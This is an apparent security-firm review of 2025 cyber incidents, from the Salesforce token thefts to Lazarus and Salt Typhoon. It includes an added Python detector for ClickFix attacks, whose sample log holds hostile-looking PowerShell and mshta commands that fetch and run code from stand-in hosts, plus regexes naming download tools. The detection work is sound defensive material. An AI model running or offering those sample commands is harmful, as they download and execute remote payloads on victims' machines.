2025 was a record-breaking year for cyber attacks. From Salesforce leaks to state espionage, 8com highlights the biggest threats and lessons learned in its comprehensive review of the year.
The year 2025 marks a turning point in the history of digital security. Experts had warned of an escalation for years; in 2025 those warnings became reality. The threat landscape became permanent, highly automated and, at least in part, politically motivated. From massive extortion campaigns against global corporations to technologically innovative DDoS attacks, this year has shown that the defences of many organisations are hardly able to cope with the new strategies of attackers. Particularly striking was the increasing professionalisation of actors such as the ‘ShinyHunters’ group or the notorious ‘Clop’ gang, who have proven that it is often not the infrastructure of the companies themselves, but their partners and third-party providers that are the weakest link in the chain.
A prominent example of this strategy was the large-scale data theft from Salesforce customers. Salesforce itself was not compromised in this case. Instead, attackers gained access to sensitive data from numerous heavyweights such as Google, Cisco and Allianz Life via compromised OAuth tokens and third-party interfaces. At the same time, the ShinyHunters group made headlines by infiltrating the analytics service Mixpanel and gaining access to the data of over 200 million PornHub users. This case once again highlighted the enormous potential for blackmail when sensitive personal information is stolen, as its publication could have had fatal social consequences for many of those affected. Oracle E-Business Suite also came under attack when the Clop group exploited zero-day vulnerabilities to steal data from universities and global corporations – a digital raid that dragged on for months before culminating in countless blackmail emails in October 2025.
In addition to pure data theft, social engineering reached a new level of sophistication in 2025. So-called ‘ClickFix’ attacks spread rapidly, deceiving users with fake error messages or CAPTCHA queries that tricked them into manually copying malicious PowerShell commands into their systems. What began as a Windows threat quickly spread to macOS and Linux and was even commercialised through platforms such as ‘ErrTraffic’. Groups such as ‘Scattered Spider’ took an even more direct approach, targeting help desks and outsourcing partners. By skilfully manipulating support staff, they managed to bypass security controls and penetrate deep into the networks of companies such as Cognizant and Marks & Spencer. These incidents resulted in millions of pounds of damage and highlighted that humans remain one of the most critical vulnerabilities.
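The ClickFix pattern described above leaves a recognisable trace in endpoint telemetry: a scripting interpreter (PowerShell, cmd, mshta) started from the user's shell, typically explorer.exe via the Win+R Run dialog, with a command line that hides its window, bypasses execution policy, carries an encoded payload or fetches and evaluates remote content. The following detection heuristic is an added example written for this review, not 8com code and not taken from any product. It assumes process-creation events exported as JSON lines with the constructed field names `ts`, `image`, `parent` and `cmdline` (real Sysmon or EDR schemas differ), and the sample log lines, hostnames and base64 blob are constructed for illustration.

```python
"""Heuristic scoring of ClickFix-style process creations (added example).

Assumptions (not from the original article): one JSON object per line with
the keys ts, image (new process path), parent (parent process path) and
cmdline. Field names in real Sysmon/EDR exports will differ.
"""
import json
import re
from pathlib import PureWindowsPath

# Interpreters a pasted ClickFix one-liner is usually executed by.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# The Run dialog (Win+R) spawns its child from explorer.exe, so an interpreter
# under explorer.exe means a human typed or pasted the command interactively.
INTERACTIVE_PARENTS = {"explorer.exe"}

# Command-line indicators; each is weak alone, they are scored in combination.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle|in)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "policy_bypass": re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass", re.I),
    "remote_fetch": re.compile(
        r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadstring|net\.webclient"
        r"|mshta(?:\.exe)?\s+\"?https?://", re.I),
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
}


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def score_record(rec: dict) -> tuple[int, list[str]]:
    """Return (score, matched indicator names) for one process-creation record."""
    image = _basename(rec.get("image", ""))
    parent = _basename(rec.get("parent", ""))
    cmdline = rec.get("cmdline", "")
    if image not in INTERPRETERS:
        return 0, []
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    score = len(hits)
    # Interactive launch plus any indicator is the ClickFix signature; weight it.
    if parent in INTERACTIVE_PARENTS and hits:
        score += 2
    return score, hits


def analyze(lines, threshold: int = 2) -> list[dict]:
    """Parse JSON lines and return records whose score reaches the threshold."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed telemetry line; skip rather than crash
        score, hits = score_record(rec)
        if score >= threshold:
            findings.append({"ts": rec.get("ts"), "score": score,
                             "indicators": hits, "cmdline": rec.get("cmdline")})
    return findings


# Constructed sample telemetry: t1, t3 and t5 mimic ClickFix executions,
# t2 and t4 are ordinary administrator and developer activity.
SAMPLE_LOG = r"""
{"ts": "t1", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent": "C:\\Windows\\explorer.exe", "cmdline": "powershell -w hidden -ep bypass -c \"iex (iwr https://captcha-check.example/verify.txt)\""}
{"ts": "t2", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent": "C:\\Windows\\System32\\cmd.exe", "cmdline": "powershell.exe -NoProfile -Command \"Get-Service -Name Spooler\""}
{"ts": "t3", "image": "C:\\Windows\\System32\\mshta.exe", "parent": "C:\\Windows\\explorer.exe", "cmdline": "mshta https://verify-human.example/fix.hta"}
{"ts": "t4", "image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "parent": "C:\\Users\\dev\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe", "cmdline": "pwsh -File C:\\Users\\dev\\build.ps1"}
{"ts": "t5", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent": "C:\\Windows\\explorer.exe", "cmdline": "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}
"""


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG.splitlines()):
        print(f["ts"], f["score"], f["indicators"], f["cmdline"])
```

Feeding the constructed log through `analyze` flags t1, t3 and t5 and leaves the two benign launches alone. The threshold and weights are deliberately simple; in production the rule belongs in the SIEM beside the corresponding Run-dialog and clipboard telemetry, and the regexes should be tuned against a baseline of legitimate interactive PowerShell use before alerting is enabled.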
Another dark chapter of 2025 was state-sponsored cybercrime. North Korea in particular cemented its reputation as a digital aggressor. The Lazarus Group was responsible for one of the largest crypto heists in history when it stole around $1.5 billion in Ethereum from the cold wallets of the ByBit exchange. At the same time, a disturbing infiltration of Western companies by North Korean IT employees was uncovered. They used fake identities and so-called ‘laptop farms’ to get hired by US companies unnoticed and thus generate funds for the regime or engage in espionage. The ‘Salt Typhoon’ campaign played in a similar league of state espionage. Over a period of months, Chinese actors infiltrated the infrastructure of global telecommunications providers to monitor communications and steal configuration data, posing a massive threat to the national security of numerous Western countries.
Technically speaking, 2025 set new standards with record-breaking DDoS attacks. The Aisuru botnet demonstrated its enormous power with attacks that peaked at nearly 30 terabits per second, posing extreme challenges even for cloud giants such as Azure and Cloudflare. The software supply chain also remained a popular target: hundreds of thousands of malicious packages were injected into platforms such as npm and PyPI to capture developer secrets and API keys.
In summary, 2025 was the year in which the boundaries between crime, espionage and political sabotage finally became blurred. For the coming year, companies are left with the bitter realisation that ‘business as usual’ in IT security is no longer sufficient and that only a radical shift to zero-trust architectures and strict control of supply chains can offer long-term protection.